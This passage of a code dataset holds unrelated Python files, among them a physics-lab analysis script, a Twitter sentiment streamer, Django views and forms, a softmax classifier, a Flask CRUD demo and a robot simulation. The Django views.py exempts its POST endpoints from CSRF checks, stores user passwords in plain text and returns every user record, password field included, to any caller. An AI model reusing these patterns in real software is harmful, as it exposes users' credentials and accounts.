serve_forever()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"other/mac_tray/mac_tray.py","file_name":"mac_tray.py","file_ext":"py","file_size_in_byte":8395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"263233780","text":"import numpy as np\nfrom uncertainties import unumpy as unp\nfrom uncertainties.unumpy import (nominal_values as noms, std_devs as stds)\nfrom uncertainties import ufloat\nfrom scipy.stats import sem\n\nnullmessung = ufloat(8343, 118)\nnullmessung = ufloat(noms(nullmessung), stds(nullmessung)+np.sqrt(noms(nullmessung)))/60\nprint('Nullmessung', nullmessung)\n\nx = np.sqrt(2)\nzahl = np.linspace(1,9,9)\nstrecke4 = np.array([3*x, 2*x, 3, 3])\nstrecke12 = np.array([2*x, 3*x, 2*x, 3, 3, 3, 2*x, 3*x, 2*x, 3, 3, 3])\n\ndef function_mu(intensity, depth):\n return unp.log(nullmessung/intensity)/depth\n\nzahl1, counts1, fehler1 = np.genfromtxt('data/wuerfel-1.csv', unpack=True, delimiter=',')\ncounts1 = unp.uarray(counts1, np.sqrt(counts1)+fehler1)/60\n\naludicke = np.ones(12)*0.2\nmu1 = function_mu(counts1, aludicke)\nnp.savetxt('build/wuerfel-1-daten.csv', np.column_stack([zahl1, counts1, mu1]), fmt='%0.0f & %r & %r', delimiter=' & ')\nmean1 = np.mean(mu1)\nprint('Wuerfel 1: μ ', mean1)\nmn1 = 
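# --- Illustrative aside (hedged sketch) ---
# wuerfel.py above propagates counting errors with the uncertainties package
# through mu = ln(I0 / I) / d. A minimal propagation example with
# illustrative numbers, assuming the package is installed:
from uncertainties import ufloat
from uncertainties.umath import log as ulog

i0 = ufloat(139.0, 2.0)  # rate without absorber
i = ufloat(95.0, 1.5)    # rate behind d = 0.2 cm of material
mu = ulog(i0 / i) / 0.2
print(mu)                # attenuation coefficient with propagated error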
f'{mean1}'[:4]\nsm1 = f'{mean1}'[-2:]\nprint(mn1, '+/-', sm1)\nwith open('build/wuerfel-1-mu.tex', 'w') as file:\n file.write(r'μ_\\text{Al} &= (\\num{')\n file.write(f'{mn1}({sm1})')\n file.write(r'})\\:\\frac{1}{\\si{\\centi\\meter}}')\nmean1 /= 2.71\nprint('Wuerfel 1: μ ', mean1)\nmn1 = f'{mean1}'[:4]\nsm1 = f'{mean1}'[-1:]\nprint(mn1, '+/-', sm1)\nwith open('build/wuerfel-1-al.tex', 'w') as file:\n file.write(r'μ_\\text{Al} &= \\SI{')\n file.write(f'{mn1}({sm1})')\n file.write(r'}{\\centi\\meter\\squared\\per\\gram}')\n# Abschwaechung durch die Aluminiumhuelle\nalabsch = counts1/nullmessung\nnp.savetxt('build/wuerfel-1-aluminium-abschwaechung.csv', np.column_stack([zahl1, alabsch]), fmt='%r', delimiter=' & ')\nalabsch = np.mean(alabsch)\nprint('Aluminium Abschwaechung: ', alabsch)\nmn1 = f'{alabsch}'[:5]\nsm1 = f'{alabsch}'[-2:]\nprint(mn1, '+/-', sm1)\nwith open('build/aluminium-abschwaechung.tex', 'w') as file:\n file.write(r'c_\\text{Al} &= \\num{')\n file.write(f'{mn1}({sm1})')\n file.write(r'}')\n\nzahl2, counts2, fehler2 = np.genfromtxt('data/wuerfel-2.csv', unpack=True, delimiter=',')\ncounts2 /= 0.729\ncounts2 = unp.uarray(counts2, np.sqrt(counts2)+fehler2)/150\nmu2 = function_mu(counts2, strecke4)\nnp.savetxt('build/wuerfel-2-daten.csv', np.column_stack([zahl2, counts2, mu2]), fmt='%0.0f & %r & %r', delimiter=' & ')\nmean2 = np.mean(mu2)\nprint('Wuerfel 2: ', mean2)\nmn2 = f'{noms(mean2):1.3f}'\nsm2 = f'{stds(mean2):1.3f}'[-2:]\nprint(mn2, '+/-', sm2)\nwith open('build/wuerfel-2-mu.tex', 'w') as file:\n file.write(r'μ_{W2} &= \\SI{')\n file.write(f'{mn2}({sm2})')\n file.write(r'}{\\per\\centi\\meter}')\n\nzahl3, counts3, fehler3 = np.genfromtxt('data/wuerfel-3.csv', unpack=True, delimiter=',')\ncounts3 /= 0.729\ncounts3 = unp.uarray(counts3, np.sqrt(counts3)+fehler3)/100\nmu3 = function_mu(counts3, strecke4)\nnp.savetxt('build/wuerfel-3-daten.csv', np.column_stack([zahl3, counts3, mu3]), fmt='%0.0f & %r & %r', delimiter=' & ')\nmean3 = np.mean(mu3)\nprint('Wuerfel 3: ', mean3)\nmn3 = f'{noms(mean3):1.3f}'\nsm3 = f'{stds(mean3):1.3f}'[-1:]\nprint(mn3, '+/-', sm3)\nwith open('build/wuerfel-3-mu.tex', 'w') as file:\n file.write(r'μ_{W3} &= \\SI{')\n file.write(f'{mn3}({sm3})')\n file.write(r'}{\\per\\centi\\meter}')\n\nmatrix = np.array([\n[0, x, 0, x, 0, 0, 0, 0, 0],\n[0, 0, x, 0, x, 0, x, 0, 0],\n[0, 0, 0, 0, 0, x, 0, x, 0],\n[1, 1, 1, 0, 0, 0, 0, 0, 0],\n[0, 0, 0, 1, 1, 1, 0, 0, 0],\n[0, 0, 0, 0, 0, 0, 1, 1, 1],\n[0, x, 0, 0, 0, x, 0, 0, 0],\n[x, 0, 0, 0, x, 0, 0, 0, x],\n[0, 0, 0, x, 0, 0, 0, x, 0],\n[0, 0, 1, 0, 0, 1, 0, 0, 1],\n[0, 1, 0, 0, 1, 0, 0, 1, 0],\n[1, 0, 0, 1, 0, 0, 1, 0, 0],\n])\ntranmatrix = matrix.T\nzmatrix = tranmatrix.dot(matrix)\ninvmatrix = np.linalg.inv(zmatrix)\numrechnungs_matrix = invmatrix.dot(tranmatrix)\n\nzahl5, counts5, fehler5 = np.genfromtxt('data/wuerfel-5.csv', unpack=True, delimiter=',')\ncounts5 /= 0.729\ncounts5 = unp.uarray(counts5, np.sqrt(counts5)+fehler5)/100\nlncounts5 = unp.log(nullmessung/counts5)\nmu5 = umrechnungs_matrix.dot(lncounts5)\nnp.savetxt('build/wuerfel-5-daten.csv', np.column_stack([zahl5, counts5, lncounts5]), fmt='%0.0f & %r & %r', delimiter=' & ')\neisen = 0.57842404\nmessing = 0.6146008\nmu5p = unp.uarray(nominal_values=[1,2,3,4,5,6,7,8,9],std_devs=[1,2,3,4,5,6,7,8,9])\nfor i in range(9):\n if i == 0 or i == 3 or i == 6 or i == 7 or i == 8:\n mu5p[i] = (messing-mu5[i])/messing*100\n else:\n mu5p[i] = (eisen-mu5[i])/eisen*100\nprint(mu5p)\nnp.savetxt('build/wuerfel-5.csv', np.column_stack([zahl, mu5]), fmt='%r', 
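# --- Illustrative aside (hedged sketch) ---
# The tomographic reconstruction above solves the overdetermined system
# A*mu = ln(I0/I) via the normal equations, (A^T A)^-1 A^T. numpy's lstsq
# returns the same least-squares solution more stably; a toy comparison:
import numpy as np

A = np.array([[1.0, 0.0], [0.0, 1.0], [1.0, 1.0]])
b = np.array([1.0, 2.0, 3.1])

normal_eq = np.linalg.inv(A.T @ A) @ A.T @ b
lstsq_sol, *_ = np.linalg.lstsq(A, b, rcond=None)
assert np.allclose(normal_eq, lstsq_sol)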
delimiter=' & ')\n\nprint('========================\\n Prozentuale Fehler')\nfrom uncertainties import unumpy as unp\nfrom uncertainties.unumpy import (nominal_values as noms, std_devs as stds)\nfrom uncertainties import ufloat\n\nw2 = ufloat(0.603, 0.010)\nw2p = (messing-w2)/messing*100\nprint('w2p', w2p)\n\nw3 = ufloat(0.076, 0.009)\nw3p = (eisen-w3)/eisen*100\nprint('w3p', w3p)\n","sub_path":"v14-tomographie/python-skripts/wuerfel.py","file_name":"wuerfel.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"348369965","text":"import requests\nimport os\nimport json\nimport config\n\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\n\nclass TwitterStream:\n def __init__(self, bearer_token, timeframe=60, verbose=True):\n self.verbose = verbose\n self.bearer_token = bearer_token\n self.timeframe = timeframe\n self.headers = None\n if self.verbose:\n print(\"Resetting rules\")\n self.resetRules()\n if (self.verbose):\n print(\"Ready to start\")\n\n def start(self):\n analyzer = SentimentIntensityAnalyzer()\n self.get_stream(set, analyzer)\n\n def resetRules(self):\n self.headers = self.create_headers()\n rules = self.get_rules()\n delete = self.delete_all_rules(rules)\n set = self.set_rules(delete)\n\n def create_headers(self):\n headers = {\"Authorization\": \"Bearer {}\".format(self.bearer_token)}\n return headers\n\n def get_rules(self):\n response = requests.get(\n \"https://api.twitter.com/2/tweets/search/stream/rules\", headers=self.headers\n )\n if response.status_code != 200:\n raise Exception(\n \"Cannot get rules (HTTP {}): {}\".format(\n response.status_code, response.text)\n )\n return response.json()\n\n def delete_all_rules(self, rules):\n if rules is None or \"data\" not in rules:\n return None\n\n ids = list(map(lambda rule: rule[\"id\"], rules[\"data\"]))\n payload = {\"delete\": {\"ids\": ids}}\n response = requests.post(\n \"https://api.twitter.com/2/tweets/search/stream/rules\",\n headers=self.headers,\n json=payload\n )\n if response.status_code != 200:\n raise Exception(\n \"Cannot delete rules (HTTP {}): {}\".format(\n response.status_code, response.text\n )\n )\n\n def set_rules(self, delete):\n sample_rules = [\n {\"value\": \"#Eth Ethereum lang:en\"}\n ]\n payload = {\"add\": sample_rules}\n response = requests.post(\n \"https://api.twitter.com/2/tweets/search/stream/rules\",\n headers=self.headers,\n json=payload,\n )\n if response.status_code != 201:\n raise Exception(\n \"Cannot add rules (HTTP {}): {}\".format(\n response.status_code, response.text)\n )\n\n def get_stream(self, set, analyzer):\n response = requests.get(\n \"https://api.twitter.com/2/tweets/search/stream\", headers=self.headers, stream=True,\n )\n if self.verbose:\n print(\"Connected to stream with status code {}\".format(\n response.status_code))\n if response.status_code != 200:\n raise Exception(\n \"Cannot get stream (HTTP {}): {}\".format(\n response.status_code, response.text\n )\n )\n for response_line in response.iter_lines():\n if response_line:\n json_response = json.loads(response_line)\n text = json_response['data']['text']\n score = analyzer.polarity_scores(text)\n if self.verbose:\n print(\"{:-<65} {}\".format(text, str(score)))\n\n\n","sub_path":"src/utilities/stream_data.py","file_name":"stream_data.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 
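# --- Illustrative aside (hedged sketch) ---
# The stream handler above scores each tweet with VADER's polarity_scores(),
# which returns neg/neu/pos components plus a compound score in [-1, 1].
# A minimal offline example, assuming vaderSentiment is installed:
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer

analyzer = SentimentIntensityAnalyzer()
score = analyzer.polarity_scores("Ethereum is doing great today!")
print(score['compound'])  # positive text yields a compound score > 0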
+{"seq_id":"287998432","text":"from models import QuestaoSubjetiva, RespostaSubjetiva\nfrom questao.forms import QuestaoForm\nfrom django import forms\n\nclass QuestaoSubjetivaForm(QuestaoForm):\n class Meta:\n model = QuestaoSubjetiva\n exclude = ['questionarios', 'criador', 'nivel_dinamico']\n def __init__(self, *args, **kwargs):\n super(QuestaoSubjetivaForm, self).__init__(*args, **kwargs)\n self.fields['resposta'] = forms.CharField(widget=forms.Textarea(attrs={'class':\"cleditor\", 'rows':7, 'cols':60}))\n\nclass RespostaSubjetivaForm(forms.ModelForm):\n class Meta:\n model = RespostaSubjetiva\n exclude = [\"submissao\", \"questao\"]\n \n def __init__(self, questao, *args, **kwargs):\n super(RespostaSubjetivaForm, self).__init__(*args, **kwargs)\n self.questao = questao\n self.fields['resposta'] = forms.CharField(widget=forms.Textarea(attrs={'class':\"cleditor\", 'rows':7, 'cols':60}))\n \nQuestaoSubjetiva.RespostaForm = RespostaSubjetivaForm\n\n","sub_path":"quest/questao/subjetiva/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"192923381","text":"from django.shortcuts import render\nfrom .models import Games, GamesCategory, Users,Comments\nfrom django.http import JsonResponse, HttpResponse\nfrom django.core import serializers\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\n\n\ndef getGameCategories(request):\n gameCategories = GamesCategory.objects.all()\n data = serializers.serialize('json', gameCategories)\n return HttpResponse(data)\n\n\ndef getGames(request):\n games = Games.objects.all()\n data = serializers.serialize('json', games)\n return HttpResponse(data)\n\n\ndef getGamesByCategory(request, category_id):\n games = Games.objects.filter(category__id=category_id)\n data = serializers.serialize('json', games)\n return HttpResponse(data)\n\n\ndef getGameByName(request, gameName):\n game = Games.objects.filter(name=gameName)[:1]\n data = serializers.serialize('json', game)\n return HttpResponse(data)\n\n\n@csrf_exempt\ndef getUsers(request):\n if request.method == 'GET':\n users = Users.objects.all()\n data = serializers.serialize('json', users)\n return HttpResponse(data)\n elif request.method == 'POST':\n body_unicode=request.body.decode('utf-8')\n body=json.loads(body_unicode)\n userName=body['name']\n userEmail=body['email']\n userPassword=body['password']\n user=Users(name=userName,email=userEmail,password=userPassword)\n user.save()\n return HttpResponse(\"user was created\", status=201)\n\ndef getUserByName(request,userName):\n user=Users.objects.filter(name=userName)[:1]\n data = serializers.serialize('json', user)\n return HttpResponse(data)\n\n@csrf_exempt\ndef comments(request):\n if request.method=='GET':\n comments=Comments.objects.all()\n data = serializers.serialize('json', comments)\n return HttpResponse(data)\n elif request.method=='POST':\n body_unicode=request.body.decode('utf-8')\n body=json.loads(body_unicode)\n commentText=body['comment']\n userId=body['userComments']\n user=Users.objects.filter(id=userId)[:1]\n user1=user[0]\n comment=Comments(comment=commentText,userComments=user1)\n comment.save()\n return HttpResponse(\"comment was added\",status=201)\n\ndef getUserByID(request,userID):\n users=Users.objects.filter(pk=userID)[:1]\n data=serializers.serialize('json',users)\n return 
HttpResponse(data)\n","sub_path":"geeko_backend/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"213217417","text":"#!/usr/bin/python\n\nimport numpy as np\nfrom numpy import dot, random\nimport matplotlib.pyplot as plt\nimport time\n\ndef softmax(x):\n    exps = np.nan_to_num(np.exp(x))\n    return exps/np.nan_to_num(np.sum(exps))\n\nclass classifier(object):\n    def __init__(self, input_size, classes, debug=True):\n        '''Initialize the classifier with the input vector size\n        and the number of classes required'''\n        self.input_size = input_size\n        self.classes = classes\n        self.W = random.randn(input_size, classes)\n        self.b = random.randn(classes, 1)\n        self.DEBUG = debug\n        self.cost_over_time = np.zeros(100)\n        self.l = 0.1\n\n    def setDebug(self, lev=True):\n        self.DEBUG = lev\n\n    def getCostOverTime(self):\n        return self.cost_over_time\n\n    def Y(self, train_data):\n        '''The model that predicts the class of the input vectors using\n        the current parameters.'''\n        a = dot(train_data, self.W) + np.tile(self.b.flatten(), (len(train_data), 1))\n        return np.array([softmax(x) for x in a])\n\n    def costf(self, train_data, train_targets):\n        '''train_data should contain the training inputs and\n        train_targets the target vectors. Evaluates the cross entropy cost\n        with the current set of data and parameters'''\n        Y = self.Y(train_data)\n        J = -sum([dot(t, ly) for t,ly in zip(train_targets, np.nan_to_num(np.log(np.nan_to_num(Y))))])\\\n            + 0.5*self.l*(np.linalg.norm(self.W))**2\n        return J\n\n    def grad_costf(self, train_data, train_targets):\n        '''Computes the gradient of the cost function for a batch. This one was hell\n        to calculate by hand but I did it.'''\n        Y = self.Y(train_data)\n        gradW = dot(train_data.T, (Y - train_targets)) + 2*self.l*self.W\n        gradb = np.reshape(np.sum(Y - train_targets, axis=0), (self.classes, 1)) \n        return gradW, gradb\n\n    def GD(self, train_data, train_targets, epochs=30, eta=0.01):\n        '''Trains the classifier using gradient descent. Uses the entire\n        dataset for a single epoch. 
Maybe I\\'ll implement the stochastic\n version soon.'''\n #Reserve the array \n self.cost_over_time = np.zeros(epochs)\n #Start the training\n for i in range(epochs):\n print(\"Training Epoch %d...\"%(i))\n gradW, gradb = self.grad_costf(train_data, train_targets)\n self.W = self.W - eta*gradW\n self.b = self.b - eta*gradb\n if self.DEBUG:\n cost = self.costf(train_data, train_targets)\n self.cost_over_time[i] = cost\n print(\"Cost: \"+str(cost))\n print(\"Done\")\n\n def SGD(self, train_data, train_targets, batch_size=10, epochs=30, eta=0.01, momentum=0.999):\n '''Trains the data using stochastic gradient descent.'''\n self.cost_over_time = np.zeros(epochs)\n et = eta\n for i in range(epochs):\n print(\"Training Epoch %d...\"%(i))\n #Split the data into mini batches\n NROWS = train_data.shape[0]\n ROWS = [n for n in range(NROWS)]\n random.shuffle(ROWS)\n batches = [ROWS[n:n+batch_size] for n in range(0,NROWS,batch_size)] \n \n for batch in batches:\n #Compute the gradient for the mini batches\n gradW, gradb = self.grad_costf(train_data[batch,:], train_targets[batch,:])\n #Do gradient descent for each of the mini batches\n self.W = self.W - et*gradW\n self.b = self.b - et*gradb\n \n if self.DEBUG:\n cost = self.costf(train_data, train_targets)\n self.cost_over_time[i] = cost\n print(\"Cost: \"+str(cost))\n et = eta*momentum\n print(\"Done\")\n\n def evalData(self, test_data, test_targets):\n '''Takes the testing data and calculates the number of\n incorrectly classified inputs'''\n Y = self.Y(test_data)\n TOTAL = test_data.shape[0]\n corrects = np.array(np.argmax(Y, axis=1) == np.argmax(test_targets, axis=1), dtype=float)\n pcor = 100*sum(corrects)/TOTAL\n print(\"Percentage correctly Classified: \"+str(pcor))\n return pcor/100.\n\n\nif __name__=='__main__':\n #Create dummy data for the classes\n cl1 = random.multivariate_normal([0, 2], 0.2*np.identity(2), 100)\n cl2 = random.multivariate_normal([0, -2], 0.2*np.identity(2), 100)\n cl3 = random.multivariate_normal([2, 0], 0.2*np.identity(2), 100)\n cl4 = random.multivariate_normal([-2, 0], 0.2*np.identity(2), 100)\n cl5 = random.multivariate_normal([-5, 0], 0.2*np.identity(2), 100)\n t1 = np.tile([1,0,0,0,0], (len(cl1), 1))\n t2 = np.tile([0,1,0,0,0], (len(cl2), 1))\n t3 = np.tile([0,0,1,0,0], (len(cl3), 1))\n t4 = np.tile([0,0,0,1,0], (len(cl4), 1))\n t5 = np.tile([0,0,0,0,1], (len(cl5), 1))\n \n #Everyday I'm shuffling\n DATA = np.vstack((cl1, cl2, cl3, cl4, cl5))\n TARGS = np.vstack((t1, t2, t3, t4, t5))\n COMB = np.hstack((DATA, TARGS))\n #Shufflin' shufflin' shufflin'\n np.random.shuffle(COMB)\n X = COMB[:,:2]\n T = COMB[:,2:]\n\n #And plotting\n plt.scatter(X[:,0], X[:,1])\n plt.title('Unclassified data plot')\n\n clf = classifier(2, 5)\n clf.SGD(X, T, epochs=100, eta=0.01, batch_size=20)\n\n plt.figure()\n plt.title('Cost over time')\n plt.plot(clf.cost_over_time)\n plt.ylabel('Cost')\n plt.xlabel('Epochs')\n\n #Trying to visualize the decision boundary\n h = 0.05\n x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n Z = np.argmax(clf.Y(np.c_[xx.ravel(), yy.ravel()]), axis=1)\n \n # Put the result into a color plot\n plt.figure()\n plt.title('Plot of the decision boundaries')\n Z = Z.reshape(xx.shape)\n plt.contourf(xx, yy, Z, cmap=plt.cm.Paired)\n plt.axis('off')\n\n # Plot also the training points\n plt.scatter(X[:, 0], X[:, 1], c=np.argmax(T,axis=1), cmap=plt.cm.Paired)\n\n 
plt.show()\n","sub_path":"assignment-4/multiclass_logistic_reg.py","file_name":"multiclass_logistic_reg.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"17068492","text":"def parse_file(file_name):\n \"\"\"\n Parse file info\n\n :param file_name: File path\n :return: List of the cities names from file\n \"\"\"\n cities_l = list()\n file = open(file_name, \"r\")\n for city in file:\n cities_l.append(city)\n return cities_l\n","sub_path":"common/parse_file.py","file_name":"parse_file.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"104646847","text":"# The table has been created by running BasicModelApp and SetUpDatabase we can play around with CRUD commands\n# Our goal here is to just familiarize ourselves with CRUD commands\n\nfrom BasicModelApp import db,Puppy\n\n\n# Create\nmy_puppy = Puppy('Rufus',5)\ndb.session.add(my_puppy)\ndb.session.commit()\n\n\n# Read\n# ORM filter options: Filter(), filter_by(), limit(), order_by(), group_by()\n# Executor options: all(), first(), get(), count(), paginate()\n\n# list of all puppies in table\nall_puppies = Puppy.query.all() \nprint(all_puppies)\nprint('\\n')\n\n# Grab by id\npuppy_one = Puppy.query.get(1)\nprint(puppy_one)\nprint(puppy_one.age)\nprint('\\n')\n\n# Filters\npuppy_sam = Puppy.query.filter_by(name='Sammy') # Returns list\nprint(puppy_sam)\nprint('\\n')\n\n\n# Update\n# Grab data, modify, then save changes.\nfirst_puppy = Puppy.query.get(1)\nfirst_puppy.age = 10\ndb.session.add(first_puppy)\ndb.session.commit()\n\n\n# Delete\nsecond_pup = Puppy.query.get(2)\ndb.session.delete(second_pup)\ndb.session.commit()\n\n\n# Check for changes:\nall_puppies = Puppy.query.all() # list of all puppies in table\nprint(all_puppies)\n","sub_path":"07_SQL_Databases_with_Flask/Model and CRUD/BasicCRUD.py","file_name":"BasicCRUD.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"88172106","text":"\"\"\"\ntest_commands.py\n\nTests for commands.py\n\"\"\"\n\n# core\nimport sys\nimport os\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\n# project\nimport commands\n\ndef test_get_minutes_seconds():\n # 67 seconds should equal ...\n test_seconds = 67\n # ... 
1 minute 7 seconds\n expected = (1, 7)\n result = commands.get_minutes_seconds(test_seconds)\n\n assert result == expected\n\ndef test_make_time_string_sing():\n\n test_seconds = 67\n expected = \"1 minute and 7 seconds\"\n result = commands.make_time_string(test_seconds)\n\n assert result == expected\n\ndef test_make_time_string_plural():\n\n test_seconds = 127\n expected = \"2 minutes and 7 seconds\"\n result = commands.make_time_string(test_seconds)\n\n assert result == expected","sub_path":"tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"310704898","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build\\bdist.win32\\egg\\pyramid_turbolinks\\__init__.py\n# Compiled at: 2014-11-04 02:21:20\nfrom __future__ import unicode_literals\n__major__ = 1\n__minor__ = 0\n__revision__ = 0\n__version_info__ = (\n __major__, __minor__, __revision__)\n__version__ = b'%s.%s' % (__major__, __minor__)\ntry:\n from urlparse import urlparse\nexcept ImportError:\n from urllib.parse import urlparse\n\ntry:\n from pyramid.events import NewRequest, NewResponse\n from pyramid.httpexceptions import HTTPForbidden\nexcept ImportError:\n pass\n\ndef same_origin(current_uri, redirect_uri):\n a = urlparse(current_uri)\n if not a.scheme:\n return True\n b = urlparse(redirect_uri)\n return (\n a.scheme, a.hostname, a.port) == (b.scheme, b.hostname, b.port)\n\n\ndef process_request(event):\n request = event.request\n referrer = request.environ.get(b'HTTP_X_XHR_REFERER')\n if referrer:\n request.environ[b'HTTP_REFERER'] = referrer\n\n\ndef process_response(event):\n request = event.request\n response = event.response\n referrer = request.headers.get(b'X-XHR-Referer')\n if not referrer:\n return response\n method = request.cookies.get(b'request_method')\n if not method or method != request.method:\n response.set_cookie(b'request_method', request.method)\n if response.location:\n request.session[b'_turbolinks_redirect_to'] = response.location\n if referrer and not same_origin(response.location, referrer):\n return HTTPForbidden()\n elif request.session.get(b'_turbolinks_redirect_to'):\n loc = request.session.pop(b'_turbolinks_redirect_to')\n response[b'X-XHR-Redirected-To'] = loc\n return response\n\n\ndef includeme(config):\n config.add_subscriber(process_request, NewRequest)\n config.add_subscriber(process_response, NewResponse)\n config.add_static_view(b'turbolinks', b'pyramid_turbolinks:static')","sub_path":"pycfiles/pyramid_twitcher-0.6.0.tar/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584065776","text":"from Myro import *\n\nfrom Graphics import *\n\nfrom math import *\n\n\n\n#overridden functions for the user\n\ndef getLine():\n\n #print(\"custom get line\")\n\n leftSensor = 0;\n\n rightSensor = 0;\n\n robot=getRobot()\n\n if robot != None:\n\n IR_Loc1 = [-12,5]\n\n IR_Loc2 = [-12,-5]\n\n loc = [robot.frame.getX(),robot.frame.getY()]\n\n theta = -1*radians(robot.frame.rotation)\n\n newIR_Loc1 = [cos(theta)*IR_Loc1[0] - sin(theta)*IR_Loc1[1] + loc[0],\n\n sin(theta)*IR_Loc1[0] + cos(theta)*IR_Loc1[1] + loc[1]]\n\n newIR_Loc2 = [cos(theta)*IR_Loc2[0] - sin(theta)*IR_Loc2[1] + loc[0],\n\n 
sin(theta)*IR_Loc2[0] + cos(theta)*IR_Loc2[1] + loc[1]]\n\n #newIR_Loc1 = [cos(theta)*IR_Loc1[0] - sin(theta)*IR_Loc1[1],\n\n # sin(theta)*IR_Loc1[0] + cos(theta)*IR_Loc1[1]]\n\n #newIR_Loc2 = [cos(theta)*IR_Loc2[0] - sin(theta)*IR_Loc2[1],\n\n # sin(theta)*IR_Loc2[0] + cos(theta)*IR_Loc2[1]]\n\n sim=getSimulation()\n\n for s in sim.window.canvas.shapes:\n\n if s.ToString().find(\"Picture\") != -1 and s.tag==\"Tile\":\n\n if s.hit(newIR_Loc1[0],newIR_Loc1[1]):\n\n r,g,b,a=s.getRGBA(newIR_Loc1[0],newIR_Loc1[1])\n\n if r==0 and g==0 and b==0 and a==255: \n\n leftSensor = 1\n\n if s.hit(newIR_Loc2[0],newIR_Loc2[1]):\n\n r,g,b,a=s.getRGBA(newIR_Loc2[0],newIR_Loc2[1])\n\n if r==0 and g==0 and b==0 and a==255:\n\n rightSensor = 1\n\n \n\n else:\n\n print(\"no robot for getline\")\n\n return [rightSensor,leftSensor]\n\n \n\n'''\n\nsim = Simulation(\"lineWorld\", 700, 700, Color(\"white\"))\n\n\n\nrobot=makeRobot(\"SimScribbler\", sim)\n\nrobot.frame.outline=makeColor(0,0,0,0)\n\nrobot.setPose(375,675,-90)\n\n \n\nsim.setup\n\n'''\n\n\n\n# create and name world; give window size, and background color\n\nsim = Simulation(\"My World\", 695, 273, Color(\"white\"))\n\n\n\n# walls for sim world; top left of rectanlge coordinate by bottom right rectangle coordinate\n\nsim.addWall((0, 0), (10, 273), Color(\"blue\"))\n\nsim.addWall((10, 0), (695, 10), Color(\"blue\"))\n\nsim.addWall((685, 10), (695, 90), Color(\"blue\"))\n\nsim.addWall((685, 170), (695, 273), Color(\"blue\"))\n\nsim.addWall((0, 263), (695, 273), Color(\"blue\"))\n\n\n\n#name robot and put it in \"sim\" world\n\nr=makeRobot(\"SimScribbler\", sim)\n\n\n\n# set robot position; x, y coordinates, way robot is facing by degree 0=horizontal with front facing east\n\nr.setPose(35,135,0)\n\n\n\n# picture of line to load into sim for line following, must draw line in paint and save as .png file\n\n# or line function will not work\n\n# change p=Picture(\"name of your file.png\") and nothing else\n\np=Picture(\"seqPicture.png\")\n\np.draw(sim.window)\n\np.tag=\"Tile\"\n\np.stackOnBottom()\n\n\n\nsim.setup()\n#Defining Switch statements in python with a dictionary\n#there is not a case statement in python.\n\n\n\ndef spin(): #bot spins around 360 degrees.\n for counter in range (0,4):\n turnBy(90)\n \ndef playSong():\n s=readSong(\"chariot.txt\")\n r.playSong(s)\n \n\n# function that will make the robot beep if it is called and a line\n\n# is detected\n\ndef beepLine():\n\n # left and right must be initialized like this for use\n left, right = getLine()\n \n\n if left==1 and right==1:\n print(\"Line was detected. Beep!\")\n #beep(1, 300)\n return True\n else:\n print(\"No line was detected. Stay Silent\")\n return False\n \n \nactions = {\n 1: [spin],\n 2: [playSong],\n 3: [spin, playSong,spin] \n }\n \n \ndef botPerform(func_list):\n for f in func_list:\n f() \n \n \ndef stuff():\n wait(10)\n counter = 1; #counter for switch statement\n while(counter <=3): #will run till 3 lines are found.\n forward(1, 1)\n if(beepLine()):\n botPerform(actions[counter])\n counter = counter + 1;\n while(beepLine()):\n forward(1,1)\n else:\n forward(1,1)\n \n \nstuff() \n \n","sub_path":"sequentialWorld.py","file_name":"sequentialWorld.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"515472920","text":"# -*- coding: utf-8 -*- #\n# Copyright 2015 Google Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for rolling-updates list-instance-updates command.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.util import apis as core_apis\nfrom googlecloudsdk.core import properties\n\nfrom tests.lib import test_case\nfrom tests.lib.surface.compute import 